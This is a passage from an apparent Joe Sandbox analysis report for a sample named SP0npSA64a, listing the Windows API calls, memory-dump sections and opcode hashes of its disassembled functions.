                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1795658109-0
                                                                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                  • GetCaretPos.USER32(?), ref: 004743B2
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                  • GetForegroundWindow.USER32 ref: 004743EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                  APIs
                                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                  • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                  • _wcslen.LIBCMT ref: 00449519
                                                                                  • _wcslen.LIBCMT ref: 00449526
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_wcslen$_wcspbrk
                                                                                  • String ID:
                                                                                  • API String ID: 2886238975-0
                                                                                  • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                  • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                  • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                  • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __setmode$DebugOutputString_fprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1792727568-0
                                                                                  • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                  • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                  • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                  • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                  APIs
                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                  • String ID:
                                                                                  • API String ID: 2169480361-0
                                                                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                  APIs
                                                                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 3850814276-3896280584
                                                                                  • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                  • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                  APIs
                                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                  • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                  • _memmove.LIBCMT ref: 0046D475
                                                                                  • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 2502553879-0
                                                                                  • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                  • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                  • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                  • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                  APIs
                                                                                  • SendMessageW.USER32 ref: 00448C69
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 312131281-0
                                                                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                  APIs
                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastacceptselect
                                                                                  • String ID:
                                                                                  • API String ID: 385091864-0
                                                                                  • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                  • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                  • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                  • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateMessageObjectSendShowStock
                                                                                  • String ID:
                                                                                  • API String ID: 1358664141-0
                                                                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2880819207-0
                                                                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                  • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                  • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                  • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 357397906-0
                                                                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                  APIs
                                                                                  • __wsplitpath.LIBCMT ref: 0043392E
                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                  • __wsplitpath.LIBCMT ref: 00433950
                                                                                  • __wcsicoll.LIBCMT ref: 00433974
                                                                                  • __wcsicoll.LIBCMT ref: 0043398A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                  • String ID:
                                                                                  • API String ID: 1187119602-0
                                                                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
